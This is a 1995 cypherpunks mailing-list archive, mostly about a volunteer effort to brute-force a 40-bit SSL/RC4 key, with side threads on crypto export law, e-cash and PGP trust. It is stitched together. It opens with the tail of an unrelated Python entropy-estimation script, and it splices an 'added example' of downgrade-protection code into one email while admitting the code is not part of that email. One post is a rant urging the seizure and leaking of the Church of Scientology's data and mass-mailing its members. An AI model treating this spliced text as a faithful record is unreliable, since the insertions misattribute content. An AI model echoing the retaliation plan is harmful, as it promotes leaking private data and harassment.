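        "digest": hashlib.md5(enc).hexdigest(),
        # Never credit more than the hash can carry or the input can supply.
        "credit_bits": min(128.0, estimate),
    }


# Constructed sample: runs of 0x80 alternating with 0x7f, as in the quoted
# description of a microphone input with nothing attached.
SAMPLE_RUNS = [(0x80, 300), (0x7F, 7), (0x80, 41), (0x7F, 3),
               (0x80, 255), (0x7F, 12), (0x80, 41), (0x7F, 9)]
SAMPLE = b"".join(bytes((value,)) * count for value, count in SAMPLE_RUNS)

if __name__ == "__main__":
    report = harvest(SAMPLE)
    print("raw bytes      :", report["raw_len"])
    print("RLE bytes      :", report["rle_len"])
    print("estimated bits : %.1f" % report["estimate_bits"])
    print("MD5 of RLE     :", report["digest"])
```

On the constructed sample, 668 raw bytes shrink to 18 bytes of pairs, and the figure comes out far below 128 bits, so a single digest of this buffer should not be counted as a full 128 bits of key material.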





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 23 Aug 95 22:54:02 PDT
To: cypherpunks@toad.com
Subject: Brute SSL Challenge
Message-ID: <199508240552.AAA00601@gnupln8.usis.com>
MIME-Version: 1.0
Content-Type: text/plain



Just skip this silly little message if you know enough to
optimize the brutessl code.


Didn't know of a better place to put this, so please no flames.

Hopefully everyone on here is accomplished enough to know
optimizing the brutessl code helps immensely.  If not, well I used

gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
                     brutessl.c search.o

To go from 5,000 keys per second to 10,100 keys per second.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 23 Aug 95 23:52:30 PDT
To: cypherpunks@toad.com
Subject: Global Investing using Electronic Tools
Message-ID: <199508240929.EAA26390@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


The Business Week Guide to Global Investments using Electronic Tools.

Dear Cypherpunks,

   While I was hunting around a Waldenbooks store, I found the above
named book. It's by Robert Schwabach, published by Osborne McGraw-Hill.
It retails at $39.95 and comes with 3 3 1/2" diskettes. I just glanced
thru it. It may be of interest to some Cypherpunks. I don't know if it
would be useful for PRIVATE foreign investing or not.

                                                      Yours Truly,
                                                      Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 24 Aug 95 00:54:28 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Linux brutessl client
In-Reply-To: <"swan.cl.cam.:164680:950824065040"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.950824015247.452A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> Date: Thu, 24 Aug 1995 07:50:32 +0100
> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> To: zinc <zinc@zifi.genetics.utah.edu>
> Cc: Sam Quigley <poodge@econ.Berkeley.EDU>, cypherpunks@toad.com
> Subject: Re: Linux brutessl client
> 
> I discovered that there was a problem with "require" under perl 5.001
> (if one does a require on getopts.pl, the perl CRASHES with some flag
> combinations) so I inlined getopts.pl, and changed the comments, but left
> the first part of the sentence -- the "if you have no getopts" was omitted.
> 
> SO: in brief do *NOT* add the "s" flag to the first line of brclient !

i just want to mention that i obtained the newest code from the web site, 
compiled and everything is working fine.  i started brloop as a 
background process, hope that's ok...

anyway, seems to be doing ok.  i guess i'll know tomorrow when the 
cracking starts.

i think i'll try to get things working on an SGI i have access to as well.

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 24 Aug 95 01:13:09 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Brute SSL Challenge
In-Reply-To: <"swan.cl.cam.:169220:950824070545"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.950824020947.452B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 24 Aug 1995, Piete Brooks wrote:

> Date: Thu, 24 Aug 1995 08:05:33 +0100
> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> To: David Neal <dneal@usis.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Brute SSL Challenge
> 
> > Hopefully everyone on here is accomplished enough to know
> > optimizing the brutessl code helps immensely.  If not, well I used
> > 
> > gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> > gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
> >                      brutessl.c search.o
> > 
> > To go from 5,000 keys per second to 10,100 keys per second.
> 
> If people could send me timings for various compilers / flags I'll collate a
> table of speeds [see brutessl.h 1.02 for an example -- I tried using different
> sizes for the RC4 info and it appears that only ALPHAs really gain by using int]
> 
> I recommend that you do not blindly use the above flags -- I just tried it on
> our fastest machines (SGIs) and it *REDUCED* the speed from 35200 to 28400.

this resulted in a fairly significant increase on my machine (486
DX4-100 running Linux 1.2.11)

stats:

w/o optimizations: 
17 minutes and 45 seconds per segment, 15800 keys per second .

w/ opts:
16 minutes and 56 seconds per segment, 16500 keys per second.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDw0ZU3Qo/lG0AH5AQHuPAP/ZVR6Vec6vSj5uR5pgUiuFii1lEjT/6Xi
exPlRugI8bR5ClRZbGf+55ARRF63UXUFj9yaX4gGSE86K3guy/1o09r06VqcgIgv
i2QwhSE+kGfYNYhy7sm7u7pI+esSaa1OBOX0s2Gh9uz/TKUxJy+C/RJx3y3KKwQF
9UBkYocFEWY=
=MiL5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 23 Aug 95 19:25:00 PDT
To: enzo@ima.com
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <Pine.LNX.3.91.950823151630.14787E-100000@ima.net>
Message-ID: <199508240224.FAA06635@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> > I just spent an hour surfing the various crypto/cypherpunks web sites. In
> > this hour I did not come across a single non-US site that carried anything
> > else but PGP. Most non-US sites just carry rants about the evil ITAR, and
> Try these URL's:

Finland: ftp://ftp.funet.fi/pub/crypt
Sweden: ftp://ftp.sunet.se/pub/security/tools/crypt
Russia: ftp://ftp.kiae.su/pub/unix/crypto
Norway: ftp://ftp.unit.no/pub/unix/security
Australia: ftp://ftp.psy.uq.os.au/pub/Crypto

I have created a set of WWW pages at http://www.cs.hut.fi/ssh/crypto
that contains a lot of material and references to cryptographic
software, algorithms, and related information available outside the
US.  I'll expand the pages as I get suggestions for more things to put
there.  The pages will probably be quite stable and I'll try to
maintain them, so it is possible to refer to those pages wherever
references are needed for crypto archives outside the United States.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 23 Aug 95 23:51:01 PDT
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: Linux brutessl client
In-Reply-To: <Pine.LNX.3.91.950823233650.3783J-100000@zifi.genetics.utah.edu>
Message-ID: <"swan.cl.cam.:164680:950824065040"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> the perl code doesn't seem to work quite right for me though, giving 
> errors when i try to use more than one option at a time, ie.
> Identifier "main::dkltrc4" used only once: possible typo.

Sorry about that ....

I discovered that there was a problem with "require" under perl 5.001
(if one does a require on getopts.pl, the perl CRASHES with some flag
combinations) so I inlined getopts.pl, and changed the comments, but left
the first part of the sentence -- the "if you have no getopts" was omitted.

SO: in brief do *NOT* add the "s" flag to the first line of brclient !

There are new versions of brloop and brclient which might cope better with
problems with the transatlantic link -- you should use brc0.09 and brl0.03

> anyway, i'm not sure i'll be participating this time as i won't be around 
> too much.

All the better -- your machine will have more cycles for CRACKing !
The purpose of SKSP is to make it work when you are not in ...


There is a "how to" page referenced from http://www.brute.cl.cam.ac.uk/brute/
which includes some "fault finding" tips.
If you have problems, look there first.
If that doesn't help, email me, and I'll add any "common" problems to the
"how to".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 00:06:01 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Brute SSL Challenge
In-Reply-To: <199508240552.AAA00601@gnupln8.usis.com>
Message-ID: <"swan.cl.cam.:169220:950824070545"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Hopefully everyone on here is accomplished enough to know
> optimizing the brutessl code helps immensely.  If not, well I used
> 
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
>                      brutessl.c search.o
> 
> To go from 5,000 keys per second to 10,100 keys per second.

If people could send me timings for various compilers / flags I'll collate a
table of speeds [see brutessl.h 1.02 for an example -- I tried using different
sizes for the RC4 info and it appears that only ALPHAs really gain by using int]

I recommend that you do not blindly use the above flags -- I just tried it on
our fastest machines (SGIs) and it *REDUCED* the speed from 35200 to 28400.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 00:31:41 PDT
To: dneal@usis.com (David Neal)
Subject: Brute SSL Challenge
Message-ID: <9157.9508240731@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
>                      brutessl.c search.o

You wouldn't happen to have gcc under DOS would you?

Or anyone else with djgcc for DOS?

What would be really nice would be a 32 bit DOS executable, which is
very hard to obtain with any PC software, and compiling it 16 bit
suffers a huge performance hit.

In search of a 32 bit DOS binary,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 24 Aug 95 06:38:39 PDT
To: cypherpunks@toad.com
Subject: A good war cry is hard to find.
Message-ID: <199508241338.GAA11347@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Brother, can you spare a CPU cycle?

Give me your tired, your poor, your spare CPU cycles!

I never met a spare CPU cycle I didn't like.

Ladies & Gentlemen, start your spare CPU cycles!

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 00:55:28 PDT
To: somogyi@digmedia.com (Stephan Somogyi)
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <9231.9508240754@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I have a working version of BruteSSL 1.02 (without SKSP client) for
> Power Macintosh. However, as I don't want to run the risk of
> violating ITAR, I'm still investigating ways of making it
> available. Suggestions are welcome.

Just send it along... several people have been shipping various DOS
binaries out of the US, without the source.

The presumption taken was that as long as they didn't ship search.c or
assembly.c, there is no crypto source, and the binary could not be
used to encrypt anything.  (Also it's for SSL with 40 bit keys which
is export approved anyway).

You can ship a diff for brutessl.c (which contains no crypto code) if
you want the mods to be mixed back in (please include some kind of
#ifdef __MAC or whatever the standard _i_am_a_mac macro is).  Or if
that makes you uncomfortable, well we'll do without the source.

Reckon you'd be safe enough.

Anyone think otherwise?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 24 Aug 95 07:01:53 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <Pine.PMDF.3.91.950824094255.620953214B-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SOL.3.91.950824090026.23418D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Income tax, right--but may not this be correct about excise
taxes?

MacN

On Thu, 24 Aug 1995, Michael Froomkin wrote:

> On Wed, 23 Aug 1995, Alan Penny wrote:
> [snip]> 
> > This also has the interesting feature of avoiding all taxes. Until you
> > "cash out" your account you would not have to pay taxes, if you never
> > need cash out your account, you never need to pay taxes. I suspect that
> > our friendly governments would try to "correct" this "problem" in the
> > long run if they can.
> > 
> Nyet.  Any time you barter A for B, even electronically, you have a 
> taxable event.  All you have done in the above is describe a system in 
> which it is harder to detect the taxable event.
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | mfroomki@umiami.ir.miami.edu
> U. Miami School of Law     | 
> P.O. Box 248087            | It's hot here.  And humid.
> Coral Gables, FL 33124 USA |
> See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 24 Aug 95 06:11:58 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Crypto DLL's/SSLeay 0.4.5
In-Reply-To: <Pine.SOL.3.91.950824215822.9077D-100000@orb>
Message-ID: <199508241311.JAA13033@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> On the PGPphone issue, personally I feel SSLphone would be a much 
> better way of doing things.

Oh, yeah? No user certificates, no way to verify what's on the other
end. No assurances that you aren't being tricked into using a weak
algorithm because negotiation doesn't take place under cover of
signature. Lots of little potential cracks. Thanks, but no thanks.

This is not to slight your code. I'm slighting the protocol.

If folks want to secure links, stick to clean protocols to do the key
negotiation. I'm a fan of variants of STS myself, Photuris being a
biggie.

> For phone over modem, authentication is not really required

And why is that?

Perry
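
An added example (not part of the original message, and not SSL's or Photuris's actual wire format) of the point about negotiation taking place "under cover of signature": when the offer and the choice are authenticated together, a rewritten offer is rejected instead of silently yielding the weak algorithm. The algorithm labels, the key and the function names are constructed, and an HMAC under a shared key stands in for each side's signature.

```python
import hashlib
import hmac

# Constructed algorithm labels with nominal key sizes in bits (assumption).
STRENGTH = {"RC4-40": 40, "DES-56": 56, "IDEA-128": 128}

# Constructed key; a stand-in for the signature keys a real protocol would use.
AUTH_KEY = b"constructed-demo-key"


def transcript_tag(key: bytes, offer: list, choice: str) -> bytes:
    """Authenticate exactly what was offered together with what was chosen."""
    transcript = ("offer=" + ",".join(offer) + ";choice=" + choice).encode()
    return hmac.new(key, transcript, hashlib.sha256).digest()


def strip_to_weakest(offer: list) -> list:
    """Models an in-path rewrite of an offer that travels unauthenticated."""
    return [min(offer, key=STRENGTH.__getitem__)]


def negotiate(client_offer: list, in_path=None, authenticated: bool = True):
    """Run one negotiation; return (chosen algorithm, accepted by client)."""
    # The responder only ever sees the offer as it arrives on the wire.
    seen_by_server = in_path(list(client_offer)) if in_path else list(client_offer)
    choice = max(seen_by_server, key=STRENGTH.__getitem__)
    server_tag = transcript_tag(AUTH_KEY, seen_by_server, choice)

    if not authenticated:
        # Without transcript authentication the initiator can only check
        # that the choice is one of the algorithms it offered.
        return choice, choice in client_offer

    # With it, the initiator recomputes the tag over the offer it actually
    # sent; any rewrite in transit makes the two transcripts differ.
    expected = transcript_tag(AUTH_KEY, list(client_offer), choice)
    return choice, hmac.compare_digest(server_tag, expected)


if __name__ == "__main__":
    offer = ["RC4-40", "DES-56", "IDEA-128"]
    print("clean, authenticated     :", negotiate(offer))
    print("rewritten, unauthenticated:", negotiate(offer, strip_to_weakest, False))
    print("rewritten, authenticated  :", negotiate(offer, strip_to_weakest, True))
```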




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Thu, 24 Aug 95 06:45:13 PDT
To: Alan Penny <penny@tyrell.net>
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <199508240410.AA14034@tyrell.net>
Message-ID: <Pine.PMDF.3.91.950824094255.620953214B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Alan Penny wrote:
[snip]> 
> This also has the interesting feature of avoiding all taxes. Until you
> "cash out" your account you would not have to pay taxes, if you never
> need cash out your account, you never need to pay taxes. I suspect that
> our friendly governments would try to "correct" this "problem" in the
> long run if they can.
> 
Nyet.  Any time you barter A for B, even electronically, you have a 
taxable event.  All you have done in the above is describe a system in 
which it is harder to detect the taxable event.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 24 Aug 95 09:11:37 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <8AFC259.0003000363.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


BW> Be that as it may, I still think that Zimmermann assumed that
BW> key<->real-life-identity mappings would be the primary purpose for the Web
BW> of Trust when he wrote "pgpdoc1.txt".  And I think he was wrong about that.
BW> It is not "arrogant" or "offensive" to say that someone was wrong when you
BW> believe that to be the case.

  Actually, this is what qualifies as a "wicked problem". Until pgp 1.0
came along, there was no way to know how people would =actually= use a
public-key system. (Sure, there were lots of theories, and a few
academic experiments, but those don't count as RL.)

  Phil tried to anticipate the kinds of errors that would be made by
people unaccustomed to thinking in terms of attacks and threat models.
Face it, the average.net.person is not into game theory. Phil was under
severe time pressure to get a workable public key system out the door
before the government slammed it shut in his face.

  Now that we have had an opportunity to observe people using the
system, we can identify nuances that could never have been debugged on
the test bench. We can explain to people the various paradigms for
viewing keys, and the importance of being able to trust the "identity"
of an anon.id, which seems oxymoronic on the face of it.


  Some kind of explanation by analogy seems in order: We all know of
movie stars who changed their names for Show Biz, or authors who wrote
under pseudonyms. Take Mark Twain for example. A person who had read a
Twain book, or had friends (his own WOT) tell him how good/bad Twain
books were, would develop his opinion of the man's work. His ultimate
decision to (not) buy a particular Twain book has nothing to do with
the True Name of Mr. Clemens.

  Where it =does= come into play is in the realm of law. Had Twain
libelled a person, the means to identify the Man behind the Mask would
be integral to executing the judgement of the court. And even then, if
there were sufficient continuing royalties that could be attached to
satisfy the judgement, it would only be necessary to know the True Name
of the publisher.

  So we must be very careful of what it is that we are certifying when
we sign something. This is what needs to be addressed in future versions
of PGP.


 * Free the Wisner Five!
 * Free the Wisner Five!
 * Free the Wisner Five!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 24 Aug 95 10:15:52 PDT
To: poodge@econ.Berkeley.EDU
Subject: Re: Linux brutessl client
Message-ID: <9508241712.AA15565@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've been able to compile a working brutessl 1.02 client under linux
> and gcc 2.7.0, but I get abysmal search speeds.
> 
> My system is a pentium 60, which, according to the docs, ought to have
> a speed of something over 14100 kps (that's what a 486dx2/66 with no
> rotate left macro gets).
> 
> brutessl -t reports that my system can do 11200 keys per second.

<snicker> I only get 5900 keys/second on a SPARCstation 5:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Thu, 24 Aug 95 10:15:24 PDT
To: loofbour@cis.ohio-state.edu
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <9508241716.AA16094@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



   From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
   Date: Wed, 23 Aug 1995 12:35:39 -0400

   I have yet to see a date, but Digicash states several times in their
   press releases that Cyberbucks are only a trial currency, and that at
   some point in the future the trial will come to an end.

   Will the bottom drop out of the c$ market at that point?

Will there be a collectors market for c$? Does Chaumian cash work
as collectable antiques? What is the difference in value of a "real"
signed Mickey Mantle baseball card vs. one mechanically imprinted?
Will "original" digital cash have the cachet normally associated with
obsolescent objects consisting primarily of protons and neutrons? How
much will the "provenance" of my e-cash be worth? I am assuming that
the provenance of e-cash will be the same credentials which made it
unforgeable in the first place; presumably a (hobbyist?) organization
will maintain the books determining authenticity, with an obvious
self-interest to keep it afloat.

So what happens if a collectors market for antique e-cash springs up? Or
is this even conceptually possible? Or is it possible only if enough
people to make a market believe it is possible? Will Digicash open their
books or transfer them to the Smithsonian (or the computer museum) or
something? Is there a market value for the obsolete c$ database? I
wouldn't think so, but...

-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 24 Aug 95 10:28:42 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: brloop not working
In-Reply-To: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
Message-ID: <199508241726.KAA15369@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jyri Kaljundi writes:
 > I just don't seem to get brloop working. It says:
 > 
 > Command failed -- brutessl missing ?
 > 
 > what seems to be wrong is that it tries to execute command:
 > 
 > brutessl -
 > 
 > although brutessl does not have a command line option '-'. Why is the '-'
 > there after brutessl ?

     I get something similar:

ionia:/usr/people/pjm/src/ssl> brloop

 +++ Command failed -- brutessl missing ?
Scalar found where operator expected at (eval 12) line 3, near "*($p"
        (Missing operator before $p?)
 +++ FAILED on attempt 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

     I'll just use the Web keyspace server if I don't get the time to
hack around with it.

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDy2P+5Yg08fDKehAQHXvwQAtaV8M5cjrPQKQIRNk0W7u9pcMkacCTL9
74K0V21JwOlUwNkBpjJZi9RFsq0LCKh0GG2ETf9LsL9aDeNFiWZvSukYGZj4L324
J2MrcmhWbqwkoYO/Ij9+bGcKqWr9fSEvXFSMQIAGM3FghZv0jyU8T8PlovXU8hjv
G64TqxKhmuw=
=To2P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 24 Aug 95 07:33:12 PDT
To: cypherpunks@toad.com
Subject: DYS_sys
Message-ID: <199508241432.KAA09835@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Observer [NYC weekly], August 28, 1995.


   "Off The Grid: Non-Slaves of New York. 'Sovereign
   citizenship' isn't just for the power line-tapping,
   compound-dwelling white supremacists anymore. A guide to
   getting The System off your back, New York-style."

      They do not run around in military fatigues, they are
      not holed up in Central Park, and for the most part,
      they do not fall into the fringes of the extreme right
      or the extreme left. Yet here they are, in the center of
      the Center, going about their daily lives with nary an
      A.T.M. or credit card in their name, without a Social
      Security or voter registration card, without insurance
      or bank accounts and driving with licenses they
      themselves have rescinded. And one more thing: They do
      not pay any income taxes.

      What was made clear by Oklahoma City and Waco and
      Ruby Ridge, Idaho, and by Ross Perot and the Unabomber
      and most recently, Bill Bradley, is that dissatisfaction
      with "the system" is pervasive in this country. Living
      off the grid is the most personal way of expressing that
      discontent.

      But, says Sharon Biggs, who teaches a three-phase, 40
      week course out of her Washington Heights home on how to
      successfully remove oneself from the system, "the
      complexion is no longer that of the wronged individual
      or visionary. It has moved into the mainstream -- people
      who suspect that there is something wrong."


   DYS_sys (17kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Thu, 24 Aug 95 09:21:07 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Spooks and Hackers, etc.
In-Reply-To: <Pine.SOL.3.91.950819210419.18364G-100000@use.usit.net>
Message-ID: <9508241620.AA13830@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan writes
>"We need to see that police are surfing the Internet just as other people
>are," Doyle said. "This is a good example of where the law is slower than
>technology."

Duh!  Isn't the law *supposed* to be slower than technology?  It would
take a *complete* idiot to try to make a law about, say, intelligent
programs or uploads or whatever.  It's when law wants to be *faster*
than technology that we get stupidity like the CDA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 24 Aug 95 08:28:46 PDT
To: cypherpunks@toad.com
Subject: Re: Let Me Repeat, the Raids Must Be Stopped!  A PROFOUND THREAT TO FREEDOM OF SPEECH ON THE INTERNET
In-Reply-To: <199508231002.DAA03500@infinity.c2.org>
Message-ID: <9508241527.AA06465@all.net>
MIME-Version: 1.0
Content-Type: text


Begin RANT

It seems to me that the cure to the scientology situation is to get TROs
claiming that they have your copyrighted material and seize their
computers for your examination and removal, file law suits in each of
the venues against the CoS and each of the individuals (jointly and
severally) in each venue, publishing all information on the servers
containing it via anonymous remailers (from accounts gotten free via
Compuserve, AOL, delphi, etc.  and/or paid for with cash) to mailing
lists all over the world, getting the entire contents placed on-line in
a country that doesn't enforce copyright restrictions and get pointers
to it from all over the web, send massive email to all church members
(the list gleaned from their computers) giving them all the details of
the internal church financial dealings, and on and on.

end RANT

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 24 Aug 95 08:44:09 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <199508241543.LAA07735@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:16 PM 8/23/95 +0100, aba@atlas.ex.ac.uk wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>[a copy of final announce, start time 18:00 GMT, tomorrow (Thu), as
>posted to a list of USENET groups]


Is that really 1800 GMT or 1800 BST?  1400 or 1300 hrs EDT?

I'm ready to hurl my 7800 keys/sec 486/66 into the fray.  I should be able
to do about 24 segments over 12 hours tonight using brutessl.exe 1.02 for
DOS.  Maybe I should have been in line at Midnight to get WIN/95 so I could
run it automatically.

The 32-bit Windows version does *not* work with my old Windows 3.11 even
with the latest Microsoft 32-bit add in.


DCF

"No Ossifer, I'm not smoking.  I'm burning this tobacco in protest against
the fascistic policies of the Food and Drug Administration." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 24 Aug 95 08:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: Let Me Repeat, the Raids Must Be Stopped! A PROFOUND THREAT TO  FREEDOM OF SPEECH ON THE INTERNET
In-Reply-To: <9508241527.AA06465@all.net>
Message-ID: <9508241549.AA23185@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think it's simpler than that, a judge simply needs to look at the facts of the 
case, declare the warrants to be void, order the property returned and require 
payment of the 4.7 Million to Wollerstein before the courts will consider the 
matter further.

The problem seems to be that the US courts don't have the balls to deal with this 
type of behaviour.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Thu, 24 Aug 95 12:36:21 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Brute SSL Challenge
In-Reply-To: <9157.9508240731@exe.dcs.exeter.ac.uk>
